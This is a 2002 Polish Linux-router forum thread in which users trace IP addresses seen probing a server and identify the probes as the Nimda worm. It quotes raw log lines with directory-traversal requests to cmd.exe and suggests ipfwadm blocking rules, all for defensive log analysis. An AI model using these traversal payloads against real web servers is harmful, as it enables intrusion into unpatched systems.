Freesco, NND, CDN, EOS
http://forum.freesco.pl/

ip ip powiedz czyje ty jestes
http://forum.freesco.pl/viewtopic.php?f=35&t=685
Strona 1 z 1

Autor:  Anonymous [ wtorek, 22 października 2002, 19:03 ]
Tytuł:  ip ip powiedz czyje ty jestes

khe khe
a wiec tak:

ciagle pojawiiaja sie wpisy w logach ip takie to a takie i proba polaczenia np z portem 80 (po jakiego to ni wiem) albo z innymi portami

nurtuje mnie sprawa kto to

czy jest rozsadny sposob sprawdzenia kto to bez powiadamiania tepsy itp

Autor:  Anonymous [ wtorek, 22 października 2002, 19:06 ]
Tytuł: 

a niech tam niech wszyscy wiedza

to o te ip chodzi (potrafia w ciagu 5minut nawiazac 10 prob polazenia):


207.144.202
80.5.55.76
80.49.4.23
213.118.27.96
80.49.181.82
80.14.38.92

moze sie dowqiem wreszcie

Autor:  Anonymous [ wtorek, 22 października 2002, 19:27 ]
Tytuł: 

: [/] [] ()
207.144.202    dodaj 4 liczbe
80.5.55.76     public2-with2-5-cust76.manc.broadband.ntl.com
80.49.4.23     pi23.czestochowa.sdi.tpnet.pl
213.118.27.96  D5761B60.kabel.telenet.be
80.49.181.82   pa82.bychawa.sdi.tpnet.pl
80.14.38.92    APoitiers-106-1-5-92.abo.wanadoo.fr

Autor:  Bolo_B [ wtorek, 22 października 2002, 19:31 ]
Tytuł: 

80.5.55.76 - public2-with2-5-cust76.manc.broadband.ntl.com
80.49.4.23 - pi23.czestochowa.sdi.tpnet.pl
213.118.27.96 - D5761B60.kabel.telenet.be
80.49.181.82 - pa82.bychawa.sdi.tpnet.pl
80.14.38.92 - APoitiers-106-1-5-92.abo.wanadoo.fr

No to ktoś co ma sdi włazi Tobie na serwer - szuka:
www jak 80 (albo control panel)
23 to telnet
22 to ssh
21 ftp

Nikt nie jest anonimowy 8) :lol:
Oby te ip nie pojawiały się teraz u mnie :?

Autor:  Anonymous [ wtorek, 22 października 2002, 19:33 ]
Tytuł: 

Masz moze Apacha zainstalowanego ?
a w logach:
: [/] [] ()
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3670
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3670
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3670


Ponoc to Nimda.

Autor:  Bolo_B [ wtorek, 22 października 2002, 19:34 ]
Tytuł: 

Ach RoBoS mnie ubiegł jak sprawdzałem 8) :lol: :wink:

Autor:  Anonymous [ wtorek, 22 października 2002, 19:36 ]
Tytuł: 

Ale wynik taki sam, nie jest zle. :P

Autor:  Bolo_B [ wtorek, 22 października 2002, 19:37 ]
Tytuł: 

Ten log to ewidentny włam na Win2000/NT jak mi się zdaje.

Autor:  Anonymous [ wtorek, 22 października 2002, 19:41 ]
Tytuł: 

Fajny robaczek NIMDA na rodzinke NT. :lol:
To dopiero zasrywa logi. :P

Autor:  Anonymous [ środa, 23 października 2002, 16:41 ]
Tytuł: 

dziekuje
apacha ni mam

a to sdi to chyba nawet wiem kto to musze sie przejsc do kolesia
:twisted: :twisted: :twisted: :twisted: :twisted:

Autor:  Anonymous [ czwartek, 31 października 2002, 12:16 ]
Tytuł: 

Niekoniecznie mogą to być próby włamuff :)

Jak ktoś ma odpalony DC albo Imesha tudziez Kazee to tego typu kwiatki nie powinny cie martwic jeśli odnoszą się od wysokich portów [passive w DC] albo do jednego [np.411] - te aplikacje mają to do siebie że ipfwadm -M -ln głupieje ;wiem z autopsji ...
Gorzej jeśli widzisz w logach np. 1sek połączenia z serwerem FTP ktory masz odpalony na jakims niestandardowym porcie typu 999... automatycznie wtedy trzeba banana postawić na konkretne IPki :)

Autor:  C-O-N [ środa, 6 listopada 2002, 14:26 ]
Tytuł:  taki wirus

Taki wirusek jak wy piszecie dopadl tez moj serv :(
Tylko skad go dorwal to nie wiem...

Powiedzcie jak zblokowac jego ip. Czy wystarczy do rc-user
na koncu dopisac :
: [/] [] ()
ipfwadm -I -a deny -P tcp -S adres_ip -D 0/0


Tym blokuje pakiety a freesco ma jakas black list?
host.deny nie znalazlem :(

Autor:  Bolo_B [ środa, 6 listopada 2002, 15:14 ]
Tytuł: 

Jak chodzi o NIMDE to wystarczy, że ktoś w sieci złpie ją i będzie sie dobijać do serwera. Taki wirus może atakować ze wszystkich stron, szczególnie po LAN'ie. Może ktoś w sieci ma wirusa, albo Ty. Radze sprawdzić kompy w sieci jakimś antywirusem.

Autor:  Anonymous [ środa, 6 listopada 2002, 15:29 ]
Tytuł:  Re: taki wirus

C-O-N pisze:
host.deny nie znalazlem :(

Banlist.cfg to chyba jest odpowiednik :P

Strona 1 z 1 Strefa czasowa UTC+2godz.
Powered by phpBB® Forum Software © phpBB Group
https://www.phpbb.com/